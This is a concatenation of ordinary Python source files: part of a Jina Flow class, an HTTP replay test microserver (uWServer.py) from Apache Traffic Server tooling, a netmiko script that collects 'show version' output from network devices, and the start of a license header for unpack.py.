op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading or multiprocessing event that, once set, will return control
to the main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
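# A minimal blocking sketch (the event wiring is illustrative): block() waits
# on the given event, or on an internal event that is set when the Flow is
# closed from another thread.
#
#   stop = threading.Event()
#   with Flow().add() as f:
#       threading.Timer(60, stop.set).start()   # release after ~60s
#       f.block(stop_event=stop)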
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# Flow is running already, protocol cant be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
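# A minimal sketch of switching protocol before start (illustrative): the
# setter accepts either a string or a GatewayProtocolType and must be used
# before the Flow is running.
#
#   f = Flow()
#   f.protocol = 'http'        # or GatewayProtocolType.HTTP
#   with f:
#       ...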
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pea_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
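    # Hedged usage sketch: with an HTTP Flow, an Executor endpoint declared via
    # `@requests(on='/foo')` could be exposed under a custom HTTP path
    # (names below are placeholders), e.g.
    #
    #   f = Flow(protocol='http')
    #   f.expose_endpoint('/foo', path='/bar', summary='my endpoint')
    #
    # The kwargs are simply stored in `_endpoints_mapping` and picked up when
    # the HTTP gateway builds its routes.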
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
uses_with=uses_with,
any_event_loop=True,
)
def scale(
self,
pod_name: str,
replicas: int,
):
"""
Scale the amount of replicas of a given Executor.
:param pod_name: pod to update
:param replicas: The number of replicas to scale to
"""
# TODO when replicas-host is ready, needs to be passed here
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].scale,
replicas=replicas,
any_event_loop=True,
)
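    # Hedged usage sketch: both calls are blocking wrappers around async pod
    # operations; pod name and arguments below are placeholders, e.g.
    #
    #   f.rolling_update('encoder', uses_with={'threshold': 0.5})
    #   f.scale('encoder', replicas=3)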
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
        if 'port_expose' in self._common_kwargs:
            kwargs = copy.deepcopy(self._common_kwargs)
            kwargs['port'] = self._common_kwargs['port_expose']
        else:
            kwargs = self._common_kwargs
        return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
uWServer.py
|
#!/bin/env python3
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
import http.client
import cgi
import time
import sys
import json
import os
import threading
from ipaddress import ip_address
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn, ForkingMixIn, BaseServer
from http import HTTPStatus
import argparse
import ssl
import socket
import importlib.util
import time
test_mode_enabled = True
lookup_key_ = "{PATH}"
__version__ = "1.0"
sys.path.append(
os.path.normpath(
os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'..'
)
)
)
import sessionvalidation.sessionvalidation as sv
SERVER_PORT = 5005 # default port
SERVER_DELAY = 0 # default delay
HTTP_VERSION = 'HTTP/1.1'
G_replay_dict = {}
count = 0
# Simple class to hold lists of callbacks associated with a key.
class HookSet:
# Helper class to provide controlled access to the HookSet to the loading module.
class Registrar:
def __init__(self, hook_set):
self.hooks = hook_set
def register(self, hook, cb):
self.hooks.register(hook, cb)
def __init__(self):
self.hooks = {}
self.modules = []
self.registrar = HookSet.Registrar(self)
# Define all the valid hooks here.
for item in ['ReadRequestHook']:
if isinstance(item, list):
hook = item[0]
label = item[1]
else:
hook = label = item
exec("HookSet.{} = '{}'".format(label, hook))
exec("HookSet.Registrar.{} = '{}'".format(label, hook))
self.hooks[hook] = []
def load(self, source):
try:
spec = importlib.util.spec_from_file_location('Observer', source)
mod = importlib.util.module_from_spec(spec)
mod.Hooks = self.registrar
spec.loader.exec_module(mod)
except ImportError:
print("Failed to import {}".format(source))
else:
self.modules.append(mod)
# Add a callback cb to the hook.
# Error if the hook isn't defined.
def register(self, hook, cb):
if hook in self.hooks:
self.hooks[hook].append(cb)
else:
raise ValueError("{} is not a valid hook name".format(hook))
# Invoke a hook. Pass on any additional arguments to the callback.
def invoke(self, hook, *args, **kwargs):
        cb_list = self.hooks.get(hook)
        if cb_list is None:
            raise ValueError("{} is not a valid hook name to invoke".format(hook))
else:
for cb in cb_list:
cb(*args, **kwargs)
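# Hedged observer sketch (not part of the original source): a module passed via
# `--load` gets a `Hooks` registrar injected by HookSet.load() and can register
# callbacks on the hooks defined above, roughly like this:
#
#   # observer.py
#   def on_read_request(headers):
#       print("saw request headers:", headers)
#
#   Hooks.register(Hooks.ReadRequestHook, on_read_request)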
class ThreadingServer(ThreadingMixIn, HTTPServer):
'''This class forces the creation of a new thread on each connection'''
def __init__(self, local_addr, handler_class, options):
HTTPServer.__init__(self, local_addr, handler_class)
self.hook_set = HookSet()
if (options.load):
self.hook_set.load(options.load)
class ForkingServer(ForkingMixIn, HTTPServer):
'''This class forces the creation of a new process on each connection'''
pass
class SSLServer(ThreadingMixIn, HTTPServer):
def __init__(self, server_address, HandlerClass, options):
BaseServer.__init__(self, server_address, HandlerClass)
pwd = os.path.dirname(os.path.realpath(__file__))
keys = os.path.join(pwd, options.key)
certs = os.path.join(pwd, options.cert)
self.options = options
self.hook_set = HookSet()
self.daemon_threads = True
self.protocol_version = 'HTTP/1.1'
if options.load:
self.hook_set.load(options.load)
if options.clientverify:
self.socket = ssl.wrap_socket(socket.socket(self.address_family, self.socket_type),
keyfile=keys, certfile=certs, server_side=True, cert_reqs=ssl.CERT_REQUIRED, ca_certs='/etc/ssl/certs/ca-certificates.crt')
else:
self.socket = ssl.wrap_socket(socket.socket(self.address_family, self.socket_type),
keyfile=keys, certfile=certs, server_side=True)
self.server_bind()
self.server_activate()
print("Port Configured for SSL communication")
class MyHandler(BaseHTTPRequestHandler):
def handleExpect100Continue(self, contentLength, chunked=False):
print("....expect", contentLength)
self.wfile.write(bytes('HTTP/1.1 100 Continue\r\n\r\n', 'UTF-8'))
# self.send_response(HTTPStatus.CONTINUE)
# self.send_header('Server','blablabla')
#self.send_header('Connection', 'keep-alive')
# self.end_headers()
if(not chunked):
message = self.rfile.read(contentLength)
else:
readChunks()
def getLookupKey(self, requestline):
global lookup_key_
kpath = ""
path = ""
url_part = requestline.split(" ")
if url_part:
if url_part[1].startswith("http"):
path = url_part[1].split("/", 2)[2]
host_, path = path.split("/", 1)
else:
path = url_part[1].split("/", 1)[1]
argsList = []
keyslist = lookup_key_.split("}")
for keystr in keyslist:
if keystr == '{PATH':
kpath = kpath + path
continue # do not include path in the list of header fields
if keystr == '{HOST':
kpath = kpath + host_
continue
stringk = keystr.replace("{%", "")
argsList.append(stringk)
KeyList = []
for argsL in argsList:
print("args", argsL, len(argsL))
if len(argsL) > 0:
val = self.headers.get(argsL)
if val:
field_val, __ = cgi.parse_header(val)
else:
field_val = None
if field_val != None:
KeyList.append(field_val)
key = "".join(KeyList) + kpath
print("lookup key", key, len(key))
return key
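    # Worked example of the key construction above: with the default
    # lookup_key_ "{PATH}" and request line "GET /some/resource HTTP/1.1",
    # the key is "some/resource"; with "{%Host}{PATH}" and a "Host: example.com"
    # header it becomes "example.comsome/resource" (header values are
    # concatenated in front of the path).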
def parseRequestline(self, requestline):
testName = None
return testName
def testMode(self, requestline):
print(requestline)
key = self.parseRequestline(requestline)
self.send_response(200)
self.send_header('Connection', 'close')
self.end_headers()
def get_response_code(self, header):
# this could totally go wrong
return int(header.split(' ')[1])
def generator(self):
yield 'micro'
yield 'server'
yield 'apache'
yield 'traffic'
yield 'server'
def send_response(self, code, message=None):
''' Override `send_response()`'s tacking on of server and date header lines. '''
# self.log_request(code)
self.send_response_only(code, message)
def createDummyBodywithLength(self, numberOfbytes):
if numberOfbytes == 0:
return None
        # build a dummy body of exactly numberOfbytes characters
        return 'a' + 'b' * (numberOfbytes - 1)
def writeChunkedData(self):
for chunk in self.generator():
response_string = bytes('%X\r\n%s\r\n' % (len(chunk), chunk), 'UTF-8')
self.wfile.write(response_string)
response_string = bytes('0\r\n\r\n', 'UTF-8')
self.wfile.write(response_string)
def readChunks(self):
raw_data = b''
raw_size = self.rfile.readline(65537)
size = str(raw_size, 'UTF-8').rstrip('\r\n')
# print("==========================================>",size)
size = int(size, 16)
while size > 0:
#print("reading bytes",raw_size)
chunk = self.rfile.read(size + 2) # 2 for reading /r/n
#print("cuhnk: ",chunk)
raw_data += chunk
raw_size = self.rfile.readline(65537)
size = str(raw_size, 'UTF-8').rstrip('\r\n')
size = int(size, 16)
#print("full chunk",raw_data)
chunk = self.rfile.readline(65537) # read the extra blank newline \r\n after the last chunk
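    # For reference, the chunked body consumed above has the wire form
    #   b'5\r\nhello\r\n0\r\n\r\n'
    # i.e. <hex size>\r\n<data>\r\n repeated, terminated by a zero-size chunk.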
def send_header(self, keyword, value):
"""Send a MIME header to the headers buffer."""
if self.request_version != 'HTTP/0.9':
if not hasattr(self, '_headers_buffer'):
self._headers_buffer = []
self._headers_buffer.append(
("%s: %s\r\n" % (keyword, value)).encode('UTF-8', 'strict')) # original code used latin-1.. seriously?
if keyword.lower() == 'connection':
if value.lower() == 'close':
self.close_connection = True
elif value.lower() == 'keep-alive':
self.close_connection = False
def parse_request(self):
"""Parse a request (internal).
The request should be stored in self.raw_requestline; the results
are in self.command, self.path, self.request_version and
self.headers.
Return True for success, False for failure; on failure, an
error is sent back.
"""
global count, test_mode_enabled
self.command = None # set in case of error on the first line
self.request_version = version = self.default_request_version
self.close_connection = True
requestline = str(self.raw_requestline, 'UTF-8')
# print("request",requestline)
requestline = requestline.rstrip('\r\n')
self.requestline = requestline
# Examine the headers and look for a Connection directive.
try:
self.headers = http.client.parse_headers(self.rfile,
_class=self.MessageClass)
self.server.hook_set.invoke(HookSet.ReadRequestHook, self.headers)
# read message body
if self.headers.get('Content-Length') != None:
bodysize = int(self.headers.get('Content-Length'))
#print("length of the body is",bodysize)
message = self.rfile.read(bodysize)
#print("message body",message)
elif self.headers.get('Transfer-Encoding', "") == 'chunked':
# print(self.headers)
self.readChunks()
except http.client.LineTooLong:
self.send_error(
HTTPStatus.BAD_REQUEST,
"Line too long")
return False
except http.client.HTTPException as err:
self.send_error(
HTTPStatus.REQUEST_HEADER_FIELDS_TOO_LARGE,
"Too many headers",
str(err)
)
return False
words = requestline.split()
if len(words) == 3:
command, path, version = words
if version[:5] != 'HTTP/':
self.send_error(
HTTPStatus.BAD_REQUEST,
"Bad request version (%r)" % version)
return False
try:
base_version_number = version.split('/', 1)[1]
version_number = base_version_number.split(".")
# RFC 2145 section 3.1 says there can be only one "." and
# - major and minor numbers MUST be treated as
# separate integers;
# - HTTP/2.4 is a lower version than HTTP/2.13, which in
# turn is lower than HTTP/12.3;
# - Leading zeros MUST be ignored by recipients.
if len(version_number) != 2:
raise ValueError
version_number = int(version_number[0]), int(version_number[1])
except (ValueError, IndexError):
self.send_error(
HTTPStatus.BAD_REQUEST,
"Bad request version (%r)" % version)
return False
if version_number >= (1, 1) and self.protocol_version >= "HTTP/1.1":
self.close_connection = False
if version_number >= (2, 0):
self.send_error(
HTTPStatus.HTTP_VERSION_NOT_SUPPORTED,
"Invalid HTTP Version (%s)" % base_version_number)
return False
elif len(words) == 2:
command, path = words
self.close_connection = True
if command != 'GET':
self.send_error(
HTTPStatus.BAD_REQUEST,
"Bad HTTP/0.9 request type (%r)" % command)
return False
elif not words:
count += 1
print("bla bla on 157 {0} => {1}".format(count, self.close_connection))
return False
else:
self.send_error(
HTTPStatus.BAD_REQUEST,
"Bad request syntax (%r)" % requestline)
return False
self.command, self.path, self.request_version = command, path, version
conntype = self.headers.get('Connection', "")
if conntype.lower() == 'close':
self.close_connection = True
elif (conntype.lower() == 'keep-alive' and
self.protocol_version >= "HTTP/1.1"):
self.close_connection = False
return True
def do_GET(self):
global G_replay_dict, test_mode_enabled
if test_mode_enabled:
time.sleep(time_delay)
request_hash = self.getLookupKey(self.requestline)
else:
request_hash, __ = cgi.parse_header(self.headers.get('Content-MD5'))
# print("key:",request_hash)
try:
response_string = None
chunkedResponse = False
if request_hash not in G_replay_dict:
self.send_response(404)
self.send_header('Server', 'MicroServer')
self.send_header('Connection', 'close')
self.end_headers()
else:
resp = G_replay_dict[request_hash]
headers = resp.getHeaders().split('\r\n')
# set status codes
status_code = self.get_response_code(headers[0])
self.send_response(status_code)
# set headers
for header in headers[1:]: # skip first one b/c it's response code
if header == '':
continue
elif 'Content-Length' in header:
if 'Access-Control' in header: # skipping Access-Control-Allow-Credentials, Access-Control-Allow-Origin, Content-Length
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
self.send_header(header_field, header_field_val)
continue
lengthSTR = header.split(':')[1]
length = lengthSTR.strip(' ')
if test_mode_enabled: # the length of the body is given priority in test mode rather than the value in Content-Length. But in replay mode Content-Length gets the priority
if not (resp and resp.getBody()): # Don't attach content-length yet if body is present in the response specified by tester
self.send_header('Content-Length', str(length))
else:
self.send_header('Content-Length', str(length))
response_string = self.createDummyBodywithLength(int(length))
continue
if 'Transfer-Encoding' in header:
self.send_header('Transfer-Encoding', 'Chunked')
response_string = '%X\r\n%s\r\n' % (len('ats'), 'ats')
chunkedResponse = True
continue
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
# print("{0} === >{1}".format(header_field, header_field_val))
self.send_header(header_field, header_field_val)
# End for
if test_mode_enabled:
if resp and resp.getBody():
length = len(bytes(resp.getBody(), 'UTF-8'))
response_string = resp.getBody()
self.send_header('Content-Length', str(length))
self.end_headers()
if (chunkedResponse):
self.writeChunkedData()
elif response_string != None and response_string != '':
self.wfile.write(bytes(response_string, 'UTF-8'))
return
except:
e = sys.exc_info()
print("Error", e, self.headers)
self.send_response(400)
self.send_header('Connection', 'close')
self.end_headers()
def do_HEAD(self):
global G_replay_dict, test_mode_enabled
if test_mode_enabled:
request_hash = self.getLookupKey(self.requestline)
else:
request_hash, __ = cgi.parse_header(self.headers.get('Content-MD5'))
if request_hash not in G_replay_dict:
self.send_response(404)
self.send_header('Connection', 'close')
self.end_headers()
else:
resp = G_replay_dict[request_hash]
headers = resp.getHeaders().split('\r\n')
# set status codes
status_code = self.get_response_code(headers[0])
self.send_response(status_code)
# set headers
for header in headers[1:]: # skip first one b/c it's response code
if header == '':
continue
elif 'Content-Length' in header:
self.send_header('Content-Length', '0')
continue
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
#print("{0} === >{1}".format(header_field, header_field_val))
self.send_header(header_field, header_field_val)
self.end_headers()
def do_POST(self):
response_string = None
chunkedResponse = False
global G_replay_dict, test_mode_enabled
if test_mode_enabled:
request_hash = self.getLookupKey(self.requestline)
else:
request_hash, __ = cgi.parse_header(self.headers.get('Content-MD5'))
try:
if request_hash not in G_replay_dict:
self.send_response(404)
self.send_header('Connection', 'close')
self.end_headers()
resp = None
else:
resp = G_replay_dict[request_hash]
resp_headers = resp.getHeaders().split('\r\n')
# set status codes
status_code = self.get_response_code(resp_headers[0])
#print("response code",status_code)
self.send_response(status_code)
#print("reposen is ",resp_headers)
# set headers
for header in resp_headers[1:]: # skip first one b/c it's response code
if header == '':
continue
elif 'Content-Length' in header:
if 'Access-Control' in header: # skipping Access-Control-Allow-Credentials, Access-Control-Allow-Origin, Content-Length
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
self.send_header(header_field, header_field_val)
continue
lengthSTR = header.split(':')[1]
length = lengthSTR.strip(' ')
if test_mode_enabled: # the length of the body is given priority in test mode rather than the value in Content-Length. But in replay mode Content-Length gets the priority
if not (resp and resp.getBody()): # Don't attach content-length yet if body is present in the response specified by tester
self.send_header('Content-Length', str(length))
else:
self.send_header('Content-Length', str(length))
response_string = self.createDummyBodywithLength(int(length))
continue
if 'Transfer-Encoding' in header:
self.send_header('Transfer-Encoding', 'Chunked')
response_string = '%X\r\n%s\r\n' % (len('microserver'), 'microserver')
chunkedResponse = True
continue
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
#print("{0} === >{1}".format(header_field, header_field_val))
self.send_header(header_field, header_field_val)
# End for loop
if test_mode_enabled:
if resp and resp.getBody():
length = len(bytes(resp.getBody(), 'UTF-8'))
response_string = resp.getBody()
self.send_header('Content-Length', str(length))
self.end_headers()
if (chunkedResponse):
self.writeChunkedData()
elif response_string != None and response_string != '':
self.wfile.write(bytes(response_string, 'UTF-8'))
return
except:
e = sys.exc_info()
print("Error", e, self.headers)
self.send_response(400)
self.send_header('Connection', 'close')
self.end_headers()
def populate_global_replay_dictionary(sessions):
    ''' Populates the global dictionary of {uuid (string): response (Response object)} '''
global G_replay_dict
for session in sessions:
for txn in session.getTransactionIter():
G_replay_dict[txn._uuid] = txn.getResponse()
print("size", len(G_replay_dict))
# tests will add responses to the dictionary where key is the testname
def addResponseHeader(key, response_header):
G_replay_dict[key] = response_header
def _path(exists, arg):
path = os.path.abspath(arg)
if not os.path.exists(path) and exists:
msg = '"{0}" is not a valid path'.format(path)
raise argparse.ArgumentTypeError(msg)
return path
def _bool(arg):
opt_true_values = set(['y', 'yes', 'true', 't', '1', 'on', 'all'])
opt_false_values = set(['n', 'no', 'false', 'f', '0', 'off', 'none'])
tmp = arg.lower()
if tmp in opt_true_values:
return True
elif tmp in opt_false_values:
return False
else:
        msg = 'Invalid Boolean value: "{0}"\nValid options are {1}'.format(
            arg, opt_true_values | opt_false_values)
raise argparse.ArgumentTypeError(msg)
def main():
global test_mode_enabled
parser = argparse.ArgumentParser()
parser.add_argument("--data-dir", "-d",
type=lambda x: _path(True, x),
required=True,
help="Directory with data file"
)
parser.add_argument("--ip_address", "-ip",
type=str,
default='',
help="IP address of the interface to serve on"
)
parser.add_argument("--port", "-p",
type=int,
default=SERVER_PORT,
help="Port to use")
parser.add_argument("--delay", "-dy",
type=float,
default=SERVER_DELAY,
help="Response delay")
parser.add_argument("--timeout", "-t",
type=float,
default=None,
help="socket time out in seconds")
parser.add_argument('-V', '--version', action='version', version='%(prog)s {0}'.format(__version__))
parser.add_argument("--mode", "-m",
type=str,
default="test",
help="Mode of operation")
parser.add_argument("--ssl", "-ssl",
type=str,
default="False",
help="SSL port")
parser.add_argument("--key", "-k",
type=str,
default="ssl/server.pem",
help="key for ssl connnection")
parser.add_argument("--cert", "-cert",
type=str,
default="ssl/server.crt",
help="certificate")
parser.add_argument("--clientverify", "-cverify",
type=bool,
default=False,
help="verify client cert")
parser.add_argument("--load",
dest='load',
type=str,
default='',
help="A file which will install observers on hooks")
parser.add_argument("--lookupkey",
type=str,
default="{PATH}",
help="format string used as a key for response lookup: \
example: \"{%%Host}{%%Server}{PATH}\", \"{HOST}{PATH}\", \"{PATH}\"\
All the args preceded by %% are header fields in the request\
The only two acceptable arguments which are not header fields are : fqdn (represented by HOST) and the url path (represented by PATH) in a request line.\
Example: given a client request as << GET /some/resource/location HTTP/1.1\nHost: hahaha.com\n\n >>, if the user wishes the host field and the path to be used for the response lookup\
then the required format will be {%%Host}{PATH}")
args = parser.parse_args()
options = args
global time_delay
time_delay = options.delay
# set up global dictionary of {uuid (string): response (Response object)}
s = sv.SessionValidator(args.data_dir)
populate_global_replay_dictionary(s.getSessionIter())
print("Dropped {0} sessions for being malformed".format(len(s.getBadSessionList())))
# start server
try:
socket_timeout = args.timeout
test_mode_enabled = args.mode == "test"
global lookup_key_
lookup_key_ = args.lookupkey
MyHandler.protocol_version = HTTP_VERSION
if options.ssl == "True" or options.ssl == "true":
server = SSLServer((options.ip_address, options.port), MyHandler, options)
else:
server = ThreadingServer((options.ip_address, options.port), MyHandler, options)
server.timeout = 5
print("started server on port {0}".format(options.port))
        server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
except KeyboardInterrupt:
print("\n=== ^C received, shutting down httpserver ===")
server.socket.close()
# s_server.socket.close()
sys.exit(0)
if __name__ == '__main__':
main()
|
net_shver_proc_queue.py
|
#!/usr/bin/env python
from net_system.models import NetworkDevice, Credentials
import django
from netmiko import ConnectHandler
from datetime import datetime
from multiprocessing import Process, current_process, Queue
def show_version_queue(a_device, q):
output_dict = {}
creds = a_device.credentials
remote_conn = ConnectHandler(device_type=a_device.device_type, ip=a_device.ip_address, username=creds.username, password=creds.password, port=a_device.port, secret="")
output = ("#" * 30) + str(a_device.device_name) + ("#" * 30) + "\n"
output += remote_conn.send_command("show version") + "\n"
output += ("#" * 80) + "\n"
output_dict[a_device.device_name] = output
q.put(output_dict)
def main():
django.setup()
start_time = datetime.now()
q = Queue(maxsize=20)
devices = NetworkDevice.objects.all()
procs = []
for a_device in devices:
my_proc = Process(target=show_version_queue, args=(a_device,q))
my_proc.start()
procs.append(my_proc)
for a_proc in procs:
# print a_proc
a_proc.join()
while not q.empty():
my_dict = q.get()
        for k, v in my_dict.items():
            # print(k)
            print(v)
    print("\nElapsed time: " + str(datetime.now() - start_time))
if __name__ == "__main__":
main()
|
unpack.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Silvio Peroni <essepuntato@gmail.com>
#
# Permission to use, copy, modify, and/or distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright notice
# and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
